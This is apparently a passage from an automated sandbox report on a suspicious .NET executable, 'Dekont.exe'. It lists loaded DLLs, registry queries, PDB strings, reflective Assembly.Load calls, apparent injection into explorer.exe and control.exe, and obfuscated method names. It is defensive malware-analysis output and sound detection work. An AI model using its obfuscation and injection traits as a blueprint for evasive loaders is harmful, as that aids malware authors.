          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\explorer.exe | Section loaded: workfoldersshell.dll
          Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
          Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
          Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
          Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Dekont.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
          Source: C:\Users\user\Desktop\Dekont.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Dekont.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Dekont.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Dekont.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: GHQc.pdb source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdbUGP source: Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: GHQc.pdbSHA256 source: explorer.exe, 00000006.00000002.4539578368.0000000010ACF000.00000004.80000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4520058887.000000000525F000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4518750367.00000000049A0000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe
          Source: Binary string: wntdll.pdb source: Dekont.exe, Dekont.exe, 00000005.00000002.2142835506.0000000000FA0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000008.00000002.4519339857.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2146384176.0000000004B5F000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000008.00000002.4519339857.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000008.00000003.2143082654.00000000049AD000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdbUGP source: Dekont.exe, 00000005.00000002.2142264362.0000000000B47000.00000004.00000020.00020000.00000000.sdmp, Dekont.exe, 00000005.00000002.2145040101.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, control.exe, 00000008.00000002.4517839714.0000000000870000.00000040.80000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: Dekont.exe, VentanaPrincipal.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | .Net Code: I5nrIX4NqH System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs | .Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.cs | .Net Code: I5nrIX4NqH System.Reflection.Assembly.Load(byte[])
          Source: 6.2.explorer.exe.10acf840.0.raw.unpack, VentanaPrincipal.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: 8.2.control.exe.525f840.3.raw.unpack, VentanaPrincipal.cs | .Net Code: InitializeComponent System.AppDomain.Load(byte[])
          Source: Dekont.exe | Static PE information: 0x8F76A18B [Mon Apr 9 19:54:51 2046 UTC]
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0041B863 push esi; iretd 5_2_0041B866
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00416B15 push 560BADFBh; retf 5_2_00416B1A
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0040E44C push fs; iretd 5_2_0040E453
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0041D4D2 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0041D4DB push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0041D485 push eax; ret 5_2_0041D4D8
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_0041D53C push eax; ret 5_2_0041D542
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FA225F pushad ; ret 5_2_00FA27F9
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FA27FA pushad ; ret 5_2_00FA27F9
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FA283D push eax; iretd 5_2_00FA2858
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FD09AD push ecx; mov dword ptr [esp], ecx 5_2_00FD09B6
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FA1366 push eax; iretd 5_2_00FA1369
          Source: C:\Users\user\Desktop\Dekont.exe | Code function: 5_2_00FA9939 push es; iretd 5_2_00FA9940
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E514B1E push esp; retn 0000h 6_2_0E514B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E514B02 push esp; retn 0000h 6_2_0E514B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E5149B5 push esp; retn 0000h 6_2_0E514AE7
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E753B1E push esp; retn 0000h 6_2_0E753B1F
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E753B02 push esp; retn 0000h 6_2_0E753B03
          Source: C:\Windows\explorer.exe | Code function: 6_2_0E7539B5 push esp; retn 0000h 6_2_0E753AE7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_0087486D push ecx; ret 8_2_00874880
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04D409AD push ecx; mov dword ptr [esp], ecx 8_2_04D409B6
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4D485 push eax; ret 8_2_02B4D4D8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4D4D2 push eax; ret 8_2_02B4D4D8
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4D4DB push eax; ret 8_2_02B4D542
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B3E44C push fs; iretd 8_2_02B3E453
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4D53C push eax; ret 8_2_02B4D542
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B46B15 push 560BADFBh; retf 8_2_02B46B1A
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_02B4B863 push esi; iretd 8_2_02B4B866
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B1E9B5 push esp; retn 0000h 8_2_04B1EAE7
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B1EB1E push esp; retn 0000h 8_2_04B1EB1F
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04B1EB02 push esp; retn 0000h 8_2_04B1EB03
          Source: Dekont.exe | Static PE information: section name: .text entropy: 7.817099894790621
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.29b1708.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.29a52f0.1.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, kD0JNdgNBriBGn5egS.cs | High entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.2956ed4.2.raw.unpack, QBy45BY4uMbUQs88Qq.cs | High entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, o53xV5KVBHNlMPrt1S.cs | High entropy of concatenated method names: 'mqheckIk2T', 'V28e2qhPUv', 'KWxerfPQ8h', 'JjWeYpj8RG', 'cKaehwFV3m', 'aq6eQtx29Q', 'pRhe409pl5', 'Lv2ZMv5vwL', 'tBtZxvvjGW', 'UJDZgABUqJ'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, dXLIi90gD1YxCP2VrY.cs | High entropy of concatenated method names: 'q9CQuOHWOG', 'n9BQ6riu3T', 'pJ5XVLtfFs', 'w5RXtBUbta', 'DG7XkgZgxe', 'uDMXbjwMLo', 'P25XlAVDcW', 'F4uXqBdOST', 'AmSXniZ8RB', 'N6gXNeZXMK'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, wvystYkjMk7ZUTRB0S.cs | High entropy of concatenated method names: 'vlW83RCbW6', 'L5u8Rk0ysw', 'ToString', 'vPY8YiKdOa', 'akL8hgxt7j', 'wta8XiouTF', 'hXE8QaWBcq', 'ncI84nxoPu', 'nXr8OcUavP', 'PWY8dNL2sO'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, txyEf8lPUyG2q9TDW7.cs | High entropy of concatenated method names: 'Dispose', 'WK2cgVR8DW', 'tfZwHvQKfG', 'AbHWW65WQw', 'xTLcsiSS4b', 'sROczxGCkr', 'ProcessDialogKey', 'G7xwiYqJxv', 'S2NwcH4UF8', 'NpFwwflFHf'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, l8w9g3UwQjCrXkQh1u.cs | High entropy of concatenated method names: 'P1OZYmPAGb', 'eVZZhJPDEn', 'Fs3ZXnp3UU', 'OeaZQZF5XW', 'QKvZ4EwxlZ', 'JdgZOm51pm', 'wj3ZdO7jw4', 'XErZye8rKd', 'DUIZ3RvS1M', 'HojZRe23QE'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, KD9NLjLBrKbWoWnWrg.csHigh entropy of concatenated method names: 'lWdcOJNBsd', 'jegcdymrrY', 'FCMc38EvfK', 'u4xcRT7VSn', 'AhMcS7ECC6', 'tMPcDrFeU7', 'rqK88ujS5scBQjjMU3', 'bHh332vbL99a5JcJkg', 'HYZcckW95P', 'iOkc2M5xet'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, gWTlBZonjyVIuDSAHUr.csHigh entropy of concatenated method names: 'MaweaA3m1L', 'tGUe1DttpK', 'kGPeI3TaV0', 'apmejgQAOu', 'bQZeukoDRL', 'vRle0Ht4nW', 'BUre6MVdVj', 'FKDeJwilQf', 'bq7eoKfgqP', 'hYieCFgvOo'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, pbLZmIIBDF2cAWVYsk.csHigh entropy of concatenated method names: 'lx02GnftrP', 'QGV2YDEj3h', 'ja22hDBI5v', 'xPu2XXBTHt', 'Nah2QssMHN', 'jer24ynLNl', 'h4M2OBylfs', 'HAw2dhch36', 'AhV2yP1Cpi', 'O6q230r0P1'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, Ad5pmqbSK6iCB0EGWU.csHigh entropy of concatenated method names: 'fj6SN1q3od', 'Hy9SU0CDG6', 'O0dSvxmxfT', 'JNESmNdBZc', 'WNXSHjMPMZ', 'zhDSVY1nmr', 't2MStoOP4b', 'iGESktvfGK', 'i64SbQD7Tm', 'GccSlfFnjf'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, ORM41fq3I7IrBKpxUd.csHigh entropy of concatenated method names: 'CrgOYeSIuG', 'VqjOXpM6Fu', 'e0OO4UANYu', 'ryp4sh3ERV', 'KDN4zBNW7A', 'bbdOiq9HnG', 'tRuOcTb6hk', 'mbqOwJKeN6', 'TyiO235F11', 'j7POrHAyco'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, MI7I9Fpik0BUQMQXNc.csHigh entropy of concatenated method names: 'sMX8xphxPt', 'Cip8sU089m', 'qZ2ZiBD5H1', 'ugAZcYg1AO', 'ALM89bd17W', 'b6I8UWCcpJ', 'F6L8ptYCd0', 'ul08v3foVc', 'Q5a8mBUGxG', 'vA987G2Six'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, bcV7k82yEqiBMuldyC.csHigh entropy of concatenated method names: 'mNkOa8pRpu', 'yN5O1PJH7n', 'r3KOICIyv3', 'QXgOj3EAnn', 'FAPOuscfD2', 'vnwO0xLH1r', 'tYFO6MbkGa', 'FVWOJfDLtU', 'wgJOoWQpUr', 'BhbOCBb5w4'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, U196kdwOqVNkxOOxEn.csHigh entropy of concatenated method names: 'by7khNHkWuqghUAxT3L', 'Gj6mRmHCfwc2y77YC8e', 'RCq4Z3dp7c', 'YSh4e88EIV', 'cJp4KrBqBC', 'vgwmxXHoIGJZnd6vJtx', 'cSib3lHAKqkndW02HL9'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, TltckUFlAMS9dBCY9B.csHigh entropy of concatenated method names: 'tW5PJRkPxj', 'Xq1Po6VtkJ', 'nAtPAqOAdm', 't69PH4wJmO', 'sm9Pt77c4e', 'sJSPkyk8wm', 'OhaPl4topN', 'EJUPq1iy0T', 'DuePNSOlU0', 'fZ0P9UbQQB'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, RDfAsr61tisr2BWDyu.csHigh entropy of concatenated method names: 'fqLZAgcn5F', 'KchZH07OJ2', 's4NZVDvRhu', 'mNQZtqpTwd', 'h6gZvo0MFU', 'eKIZkRwqHs', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, TmW8s33hG4mvQaB21F.csHigh entropy of concatenated method names: 'J86IjMEvH', 'Kjvjm3UhD', 'oe70ZKVhC', 'zcM6Bu5Lu', 'ibpoRMfud', 'iKyCZlPcb', 'SrsRKgN4GU3JxAnNPn', 'H7tQrNRYT1j8TFisQl', 'v0VZsiquV', 'kjuKvBCy6'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csHigh entropy of concatenated method names: 'xPohvhI7wI', 'jh2hmSvfOf', 'ICWh7Hx5ZS', 'YyUhLCGBae', 'WdjhBHw9fq', 'tqvhTCra35', 'h2yhMtgBhG', 'BlRhxm2YRO', 'xEuhgPw9Lb', 'I1ghsuhBSG'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, e5nxOdzlIYqo79mMuV.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VrYeP8GLLf', 'JWBeS9rm0R', 'VCReDPD0Qq', 'Hmme8IlYWC', 'qJleZTWKsj', 'xOueew4kYS', 'vPseK3fTt9'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, kwJxqdN3GExdyc1bPB.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YxXwgLKhOk', 'Q5CwsZw8Fv', 'kGswzPU1BP', 'JGq2ij5Xvf', 'dxh2c7Jhkd', 'YWt2wOZJxq', 'tlp22JH6MQ', 'Ptpgh616eHHrjVSnlE5'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, hP0qnVoCrnGXfRDPQpc.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CruKv4dcEc', 'PQ9KmWffmv', 'fwYK7oF8W7', 'gqjKLbR4dB', 'acVKB1Wnpk', 'iQsKTECdhF', 'VCAKM53rga'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, LCBpR6tWKBHvi4TDRT.csHigh entropy of concatenated method names: 'H4pXjdBst0', 'pawX0TDqL6', 'zreXJN8Fmq', 'CsQXoV2Z0j', 'ofdXSG2FAZ', 'C4rXDsEs1C', 'XubX89bhYu', 'ltVXZ9g5m2', 'IZTXeAaRo5', 'rInXKgKpIs'
          Source: 0.2.Dekont.exe.3b6bdc0.3.raw.unpack, Sy7nxMaCWn0aUQoKQl.csHigh entropy of concatenated method names: 'HQL4GKGI0I', 'Htp4herFmm', 'EQo4Q10Xh3', 'su14Oq4xeA', 'Cnv4dCLZQA', 'RRxQBwl9Lp', 'AcTQTNc8kQ', 'n48QMR4o6O', 'uRKQxALOl0', 'jW4Qg0P5ry'
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
          Source: 0.2.Dekont.exe.6b00000.4.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, o53xV5KVBHNlMPrt1S.csHigh entropy of concatenated method names: 'mqheckIk2T', 'V28e2qhPUv', 'KWxerfPQ8h', 'JjWeYpj8RG', 'cKaehwFV3m', 'aq6eQtx29Q', 'pRhe409pl5', 'Lv2ZMv5vwL', 'tBtZxvvjGW', 'UJDZgABUqJ'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, dXLIi90gD1YxCP2VrY.csHigh entropy of concatenated method names: 'q9CQuOHWOG', 'n9BQ6riu3T', 'pJ5XVLtfFs', 'w5RXtBUbta', 'DG7XkgZgxe', 'uDMXbjwMLo', 'P25XlAVDcW', 'F4uXqBdOST', 'AmSXniZ8RB', 'N6gXNeZXMK'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, wvystYkjMk7ZUTRB0S.csHigh entropy of concatenated method names: 'vlW83RCbW6', 'L5u8Rk0ysw', 'ToString', 'vPY8YiKdOa', 'akL8hgxt7j', 'wta8XiouTF', 'hXE8QaWBcq', 'ncI84nxoPu', 'nXr8OcUavP', 'PWY8dNL2sO'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, txyEf8lPUyG2q9TDW7.csHigh entropy of concatenated method names: 'Dispose', 'WK2cgVR8DW', 'tfZwHvQKfG', 'AbHWW65WQw', 'xTLcsiSS4b', 'sROczxGCkr', 'ProcessDialogKey', 'G7xwiYqJxv', 'S2NwcH4UF8', 'NpFwwflFHf'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, l8w9g3UwQjCrXkQh1u.csHigh entropy of concatenated method names: 'P1OZYmPAGb', 'eVZZhJPDEn', 'Fs3ZXnp3UU', 'OeaZQZF5XW', 'QKvZ4EwxlZ', 'JdgZOm51pm', 'wj3ZdO7jw4', 'XErZye8rKd', 'DUIZ3RvS1M', 'HojZRe23QE'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, KD9NLjLBrKbWoWnWrg.csHigh entropy of concatenated method names: 'lWdcOJNBsd', 'jegcdymrrY', 'FCMc38EvfK', 'u4xcRT7VSn', 'AhMcS7ECC6', 'tMPcDrFeU7', 'rqK88ujS5scBQjjMU3', 'bHh332vbL99a5JcJkg', 'HYZcckW95P', 'iOkc2M5xet'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, gWTlBZonjyVIuDSAHUr.csHigh entropy of concatenated method names: 'MaweaA3m1L', 'tGUe1DttpK', 'kGPeI3TaV0', 'apmejgQAOu', 'bQZeukoDRL', 'vRle0Ht4nW', 'BUre6MVdVj', 'FKDeJwilQf', 'bq7eoKfgqP', 'hYieCFgvOo'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, pbLZmIIBDF2cAWVYsk.csHigh entropy of concatenated method names: 'lx02GnftrP', 'QGV2YDEj3h', 'ja22hDBI5v', 'xPu2XXBTHt', 'Nah2QssMHN', 'jer24ynLNl', 'h4M2OBylfs', 'HAw2dhch36', 'AhV2yP1Cpi', 'O6q230r0P1'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, Ad5pmqbSK6iCB0EGWU.csHigh entropy of concatenated method names: 'fj6SN1q3od', 'Hy9SU0CDG6', 'O0dSvxmxfT', 'JNESmNdBZc', 'WNXSHjMPMZ', 'zhDSVY1nmr', 't2MStoOP4b', 'iGESktvfGK', 'i64SbQD7Tm', 'GccSlfFnjf'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, ORM41fq3I7IrBKpxUd.csHigh entropy of concatenated method names: 'CrgOYeSIuG', 'VqjOXpM6Fu', 'e0OO4UANYu', 'ryp4sh3ERV', 'KDN4zBNW7A', 'bbdOiq9HnG', 'tRuOcTb6hk', 'mbqOwJKeN6', 'TyiO235F11', 'j7POrHAyco'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, MI7I9Fpik0BUQMQXNc.csHigh entropy of concatenated method names: 'sMX8xphxPt', 'Cip8sU089m', 'qZ2ZiBD5H1', 'ugAZcYg1AO', 'ALM89bd17W', 'b6I8UWCcpJ', 'F6L8ptYCd0', 'ul08v3foVc', 'Q5a8mBUGxG', 'vA987G2Six'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, bcV7k82yEqiBMuldyC.csHigh entropy of concatenated method names: 'mNkOa8pRpu', 'yN5O1PJH7n', 'r3KOICIyv3', 'QXgOj3EAnn', 'FAPOuscfD2', 'vnwO0xLH1r', 'tYFO6MbkGa', 'FVWOJfDLtU', 'wgJOoWQpUr', 'BhbOCBb5w4'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, U196kdwOqVNkxOOxEn.csHigh entropy of concatenated method names: 'by7khNHkWuqghUAxT3L', 'Gj6mRmHCfwc2y77YC8e', 'RCq4Z3dp7c', 'YSh4e88EIV', 'cJp4KrBqBC', 'vgwmxXHoIGJZnd6vJtx', 'cSib3lHAKqkndW02HL9'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, TltckUFlAMS9dBCY9B.csHigh entropy of concatenated method names: 'tW5PJRkPxj', 'Xq1Po6VtkJ', 'nAtPAqOAdm', 't69PH4wJmO', 'sm9Pt77c4e', 'sJSPkyk8wm', 'OhaPl4topN', 'EJUPq1iy0T', 'DuePNSOlU0', 'fZ0P9UbQQB'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, RDfAsr61tisr2BWDyu.csHigh entropy of concatenated method names: 'fqLZAgcn5F', 'KchZH07OJ2', 's4NZVDvRhu', 'mNQZtqpTwd', 'h6gZvo0MFU', 'eKIZkRwqHs', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, TmW8s33hG4mvQaB21F.csHigh entropy of concatenated method names: 'J86IjMEvH', 'Kjvjm3UhD', 'oe70ZKVhC', 'zcM6Bu5Lu', 'ibpoRMfud', 'iKyCZlPcb', 'SrsRKgN4GU3JxAnNPn', 'H7tQrNRYT1j8TFisQl', 'v0VZsiquV', 'kjuKvBCy6'
          Source: 0.2.Dekont.exe.96e0000.5.raw.unpack, qjgvDPGw0dLJ1Nb1m8.csHigh entropy of concatenated method names: 'xPohvhI7wI', 'jh2hmSvfOf', 'ICWh7Hx5ZS', 'YyUhLCGBae', 'WdjhBHw9fq', 'tqvhTCra35', 'h2yhMtgBhG', 'BlRhxm2YRO', 'xEuhgPw9Lb', 'I1ghsuhBSG'
